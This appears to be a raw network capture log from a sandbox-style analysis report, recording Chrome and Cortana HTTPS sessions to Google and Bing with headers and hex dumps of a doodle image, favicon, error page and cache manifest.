2024-09-26 15:55:32 UTC	690	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="doodle-eng" Report-To: {"group":"doodle-eng","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/doodle-eng"}]} Content-Length: 2464 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Wed, 25 Sep 2024 19:16:09 GMT Expires: Thu, 25 Sep 2025 19:16:09 GMT Cache-Control: public, max-age=31536000 Last-Modified: Wed, 25 Sep 2024 18:30:00 GMT Content-Type: image/png Age: 74363 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:32 UTC	700	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 1c 00 00 03 c0 08 03 00 00 00 49 ab 50 ae 00 00 00 45 50 4c 54 45 47 70 4c 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b c7 9e 93 17 00 00 00 17 74 52 4e 53 00 10 40 80 af 70 30 bf 9f 60 20 50 8f cf ff df ef f4 f9 fd f3 fa fe 48 96 7b a1 00 00 08 f3 49 44 41 54 78 01 ec ce 03 12 c0 40 10 04 c0 cd cc 19 ff ff 6e 6c 95 c3 2e 1c 96 72 3f 05 a8 48 40 3a 80 66 45 a3 65 30 aa be 95 b5 8e 1e 45 80 af ee aa 4a 33 32 11 9a 24 bb a4 38 35 fd 8e 20 53 75 4d cd 40 5d 3d c6 98 46 c7 1c 6e ef 6c 23 b1 36 2e 14 30 21 33 01 90 53 3f ef 72 c9 de 7d 6e b9 09 03 01 18 Data Ascii: PNGIHDRIPEPLTEGpL&&&&&&&&&&&&&&&&&&&&&&tRNS@p0` PH{IDATx@nl.r?H@:fEe0EJ32$85 SuM@]=Fnl#6.0!3S?r}n
2024-09-26 15:55:32 UTC	1390	IN	Data Raw: 45 1c 88 03 a2 cb f7 05 0f a4 88 03 71 20 0e c4 81 38 10 07 e2 00 07 8c 31 3e 47 1c 88 03 71 20 0e c4 81 38 f0 4e 4d 88 03 c4 81 38 10 07 e2 40 1c 88 03 71 20 0e c4 81 38 20 e6 04 bb b2 88 03 71 20 0e c4 81 38 10 07 e2 40 1c 88 03 c4 81 38 10 07 e2 40 1c 88 03 71 20 0e c4 81 38 40 1c dc 35 0e 70 f7 39 e2 40 1c 88 03 71 20 0e c4 81 38 10 07 e2 80 e8 12 ec ad e0 da 27 5c 18 87 38 78 85 71 40 d4 04 ab 15 cc 39 30 21 45 1c 88 83 b7 14 07 c4 39 c1 52 16 43 30 8c cf 11 07 e2 40 1c 88 03 71 20 0e c4 01 e2 40 1c bc a2 38 b0 b7 82 5d 59 88 21 c1 49 30 c4 81 38 10 07 e2 40 1c 88 03 71 20 0e c4 01 e2 40 1c 3c 5e 1c 9f 13 fc e6 40 1c 88 83 d7 13 07 4e 82 41 4c f9 0b 78 69 02 e2 40 1c 88 03 71 20 0e c4 81 38 10 07 e2 00 71 20 0e c4 81 38 10 07 e2 40 1c 88 03 71 20 0e Data Ascii: Eq 81>Gq 8NM8@q 8 q 8@8@q 8@5p9@q 8'\8xq@90!E9RC0@q @8]Y!I08@q @<^@NALxi@q 8q 8@q
2024-09-26 15:55:32 UTC	374	IN	Data Raw: 20 0e c4 81 38 10 07 e2 40 1c 88 03 71 e0 32 1e c8 b6 ff 0f de 78 43 1c 88 03 77 d9 43 4e 05 73 0e c4 81 38 10 07 e2 40 1c 88 03 71 20 0e c4 01 e2 40 1c 88 03 71 20 0e c4 81 38 10 07 e2 40 1c e0 ea 50 dc d4 84 38 10 07 e2 40 1c 88 03 73 0e c4 81 38 10 07 88 03 71 20 0e c4 81 38 10 07 e2 40 1c 88 03 71 80 38 10 07 e2 40 1c 78 a9 09 7b 48 11 07 97 72 8d d7 4d cf 00 ee 78 43 1c 88 03 71 20 0e c4 01 d9 f6 ac 61 08 86 38 10 07 fe 73 60 b5 82 38 10 07 88 03 71 20 0e c4 81 38 10 07 e2 40 1c 88 03 71 40 8e 85 9f dc cf 01 39 f5 df c1 f9 1c 88 03 71 20 0e 10 07 e2 40 1c 88 03 13 52 9c 43 8a 9f 15 c4 81 38 10 07 88 03 71 20 0e c4 81 38 10 07 9e ad 20 0e c4 81 38 20 53 c1 6a 05 71 20 0e c4 81 38 10 07 e2 e0 12 5c e5 54 18 da 3c 3e 21 45 1c 8b c2 d0 36 f3 c2 d0 2a b9 Data Ascii: 8@q2xCwCNs8@q @q 8@P8@s8q 8@q8@x{HrMxCq a8s`8q 8@q@9q @RC8q 8 8 Sjq 8\T<>!E6*

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.16	49802	216.58.212.142	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:32 UTC	787	OUT	GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1 Host: play.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw== Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
2024-09-26 15:55:32 UTC	270	IN	HTTP/1.1 400 Bad Request Date: Thu, 26 Sep 2024 15:55:32 GMT Content-Type: text/html; charset=UTF-8 Server: Playlog Content-Length: 1555 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:32 UTC	1120	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 400 (Bad Request)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-
2024-09-26 15:55:32 UTC	435	IN	Data Raw: 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3e 3c 73 70 61 6e Data Ascii: pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.16	49803	172.217.16.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:32 UTC	1479	OUT	POST /gen_204?atyp=csi&ei=64P1ZseiHfKwi-gPg-6IsAw&s=webhp&nt=navigate&t=fi&st=10053&fid=1&zx=1727366131013&opi=89978449 HTTP/1.1 Host: www.google.com Connection: keep-alive Content-Length: 0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / Origin: https://www.google.com X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
2024-09-26 15:55:32 UTC	715	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-Ykd6nrethRggGC3w52up8w' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Permissions-Policy: unload=() Date: Thu, 26 Sep 2024 15:55:32 GMT Server: gws Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.16	49804	142.250.186.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:32 UTC	758	OUT	GET /favicon.ico HTTP/1.1 Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw== Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
2024-09-26 15:55:33 UTC	705	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable" Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]} Content-Length: 5430 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 26 Sep 2024 15:37:24 GMT Expires: Fri, 04 Oct 2024 15:37:24 GMT Cache-Control: public, max-age=691200 Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT Content-Type: image/x-icon Vary: Accept-Encoding Age: 1088 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:33 UTC	685	IN	Data Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 30 fd fd fd 96 fd fd fd d8 fd fd fd f9 fd fd fd f9 fd fd fd d7 fd fd fd 94 fe fe fe 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd 99 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 95 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd c1 ff ff ff ff fa fd f9 ff b4 d9 a7 ff 76 ba 5d ff 58 ab 3a ff 58 aa 3a ff 72 b8 59 ff ac d5 9d ff f8 fb f6 ff ff Data Ascii: h& ( 0.v]X:X:rY
2024-09-26 15:55:33 UTC	1390	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d8 fd fd fd 99 ff ff ff ff 92 cf fb ff 37 52 ec ff 38 46 ea ff d0 d4 fa ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 96 fe fe fe 32 ff ff ff ff f9 f9 fe ff 56 62 ed ff 35 43 ea ff 3b 49 eb ff 95 9c f4 ff cf d2 fa ff d1 d4 fa ff 96 9d f4 ff 52 5e ed ff e1 e3 fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 30 00 00 00 00 fd fd fd 9d ff ff ff ff e8 ea fd ff 58 63 ee ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 6c 76 f0 ff ff ff ff ff ff ff ff ff fd fd fd 98 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd c3 ff ff ff ff f9 f9 fe ff a5 ac f6 ff 5d 69 ee ff 3c 4a Data Ascii: 7R8F2Vb5C;IR^0Xc5C5C5C5C5C5Clv]i<J
2024-09-26 15:55:33 UTC	1390	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff fd fd fd d0 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fd fd fd 8b ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff b1 d8 a3 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 60 a5 35 ff ca 8e 3e ff f9 c1 9f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 87 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 25 fd fd fd fb ff ff ff ff ff ff ff ff ff ff ff ff c2 e0 b7 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 6e b6 54 ff 9f ce 8d ff b7 da aa ff b8 db ab ff a5 d2 95 ff 7b bc 64 ff 54 a8 35 ff 53 a8 34 ff 77 a0 37 ff e3 89 41 ff f4 85 42 ff f4 85 42 ff Data Ascii: S4S4S4S4S4S4S4S4S4S4S4S4S4S4`5>%S4S4S4S4S4S4nT{dT5S4w7ABB
2024-09-26 15:55:33 UTC	1390	IN	Data Raw: ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff fb d5 bf ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd ea fd fd fd cb ff ff ff ff ff ff ff ff ff ff ff ff 46 cd fc ff 05 bc fb ff 05 bc fb ff 05 bc fb ff 21 ae f9 ff fb fb ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd c8 fd fd fd 9c ff ff ff ff ff ff ff ff ff ff ff ff 86 df fd ff 05 bc fb ff 05 bc fb ff 15 93 f5 ff 34 49 eb ff b3 b8 f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: BBBBBBF!4I
2024-09-26 15:55:33 UTC	575	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d2 fe fe fe 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd 8d fd fd fd fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd fb fd fd fd 8b fe fe fe 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 27 fd fd fd 9f fd fd fd f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: $'

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.16	49805	172.217.16.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:35 UTC	1621	OUT	POST /gen_204?atyp=i&ei=64P1ZseiHfKwi-gPg-6IsAw&ct=slh&v=t1&im=M&m=HV&pv=0.9621399517689093&me=1:1727366123896,V,0,0,1280,907:0,B,907:0,N,1,64P1ZseiHfKwi-gPg-6IsAw:0,R,1,1,0,0,1280,907:4231,x:2883,G,1,1,395,514:2659,h,1,1,o:651,e,B&zx=1727366134321&opi=89978449 HTTP/1.1 Host: www.google.com Connection: keep-alive Content-Length: 0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / Origin: https://www.google.com X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
2024-09-26 15:55:36 UTC	715	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-VQYvhcQ21jxw1LiDplGGUg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Permissions-Policy: unload=() Date: Thu, 26 Sep 2024 15:55:35 GMT Server: gws Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.16	49806	204.79.197.200	443

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:35 UTC	812	OUT	GET /manifest/threshold.appcache HTTP/1.1 Accept: / Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Origin: https://www.bing.com Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: www.bing.com Connection: Keep-Alive Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=3a628620&IPMID=1707317755885; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
2024-09-26 15:55:36 UTC	1202	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 3266 Content-Type: text/cache-manifest; charset=utf-8 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND" Set-Cookie: MUIDB=5047E5942BB2460EA35B53CCF78DDB3D; expires=Tue, 21-Oct-2025 15:55:35 GMT; path=/; HttpOnly Set-Cookie: SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=648e6236&IPMID=1707317782133; domain=.bing.com; expires=Tue, 21-Oct-2025 15:55:35 GMT; path=/; secure; SameSite=None X-EventID: 66f583f711ef42099f4f6a3c45e7adfb UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0= X-XSS-Protection: 0 X-Cache: CONFIG_NOCACHE Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 408B5CC5998245DFB11747537DF86D74 Ref B: EWR311000102021 Ref C: 2024-09-26T15:55:35Z Date: Thu, 26 Sep 2024 15:55:35 GMT Connection: close
2024-09-26 15:55:36 UTC	3092	IN	Data Raw: 43 41 43 48 45 20 4d 41 4e 49 46 45 53 54 0d 0a 23 20 56 65 72 73 69 6f 6e 3a 36 34 38 65 36 32 33 36 0d 0a 43 41 43 48 45 3a 0d 0a 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 0d 0a 2f 72 70 2f 71 53 4b 59 6c 55 33 39 51 77 30 68 2d 63 62 48 32 64 6d 42 54 34 45 68 38 6c 4d 2e 6a 73 0d 0a 68 74 74 70 73 3a 2f 2f 72 2e 62 69 6e 67 2e 63 6f 6d 2f 72 62 2f 31 37 2f 6a 6e 63 2c 6e 6a 2f 34 62 6e 4c 78 34 53 33 5a 52 4d 70 59 56 33 30 6b 33 52 35 76 52 79 38 4a 56 67 2e 6a 73 3f 62 75 3d 44 79 67 78 65 49 51 42 69 51 47 4d 41 59 45 42 65 33 37 45 41 63 63 42 4d 62 63 42 4d 63 6f 42 26 6f 72 3d 77 0d 0a 68 74 74 70 73 3a 2f 2f 72 2e 62 69 6e 67 2e 63 6f 6d 2f 72 62 2f 31 61 2f 63 69 72 33 2c 6f 72 74 6c Data Ascii: CACHE MANIFEST# Version:648e6236CACHE:/AS/API/WindowsCortanaPane/V2/Init/rp/qSKYlU39Qw0h-cbH2dmBT4Eh8lM.jshttps://r.bing.com/rb/17/jnc,nj/4bnLx4S3ZRMpYV30k3R5vRy8JVg.js?bu=DygxeIQBiQGMAYEBe37EAccBMbcBMcoB&or=whttps://r.bing.com/rb/1a/cir3,ortl
